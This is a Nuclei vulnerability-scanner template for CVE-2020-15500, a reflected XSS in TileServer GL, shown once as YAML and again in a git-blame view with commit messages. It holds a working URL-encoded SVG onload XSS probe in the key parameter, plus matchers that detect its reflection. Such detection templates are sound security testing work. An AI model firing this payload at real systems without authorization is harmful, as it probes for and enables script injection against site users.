nuclei-templates/cves/2020/CVE-2020-15500.yaml

id: CVE-2020-15500

info:
  name: TileServer GL Reflected XSS
  author: Akash.C
  severity: medium
  description: An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2020-15500
    - https://github.com/maptiler/tileserver-gl/issues/461
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2020-15500
    cwe-id: CWE-79
  tags: cve,cve2020,xss,tileserver

requests:
  - method: GET
    path:
      - '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "text/html"

      - type: word
        words:
          - "'>\"<svg/onload=confirm('xss')>"
        part: body
Added CVE-2020-15500 2021-04-11 10:42:21 +00:00			`id: CVE-2020-15500`

			`info:`
			`name: TileServer GL Reflected XSS`
			`author: Akash.C`
			`severity: medium`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`description: An issue was discovered in server.js in TileServer GL through 3.0.0. The content of the key GET parameter is reflected unsanitized in an HTTP response for the application's main page, causing reflected XSS.`
Changes fixes/around dynamic attributes ("additional-fields") Related nuclei tickets: * #259 - dynamic key-value field support for template information * #940 - new infos in template * #834 * RES-84 2021-08-19 13:17:27 +00:00			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2020-15500`
			`- https://github.com/maptiler/tileserver-gl/issues/461`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`cvss-score: 6.1`
Added cve annotations + severity adjustments 2021-09-10 11:26:40 +00:00			`cve-id: CVE-2020-15500`
			`cwe-id: CWE-79`
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes 2022-04-22 10:38:41 +00:00			`tags: cve,cve2020,xss,tileserver`
Added CVE-2020-15500 2021-04-11 10:42:21 +00:00
			`requests:`
			`- method: GET`
			`path:`
improved matcher 2021-05-11 19:02:16 +00:00			`- '{{BaseURL}}/?key=%27%3E%22%3Csvg%2Fonload=confirm%28%27xss%27%29%3E'`
Added CVE-2020-15500 2021-04-11 10:42:21 +00:00
			`matchers-condition: and`
			`matchers:`
			`- type: status`
			`status:`
			`- 200`

			`- type: word`
			`part: header`
			`words:`
			`- "text/html"`

			`- type: word`
			`words:`
improved matcher 2021-05-11 19:02:16 +00:00			`- "'>\"<svg/onload=confirm('xss')>"`
I think the 'words' were placed in the wrong place 2021-04-19 06:32:33 +00:00			`part: body`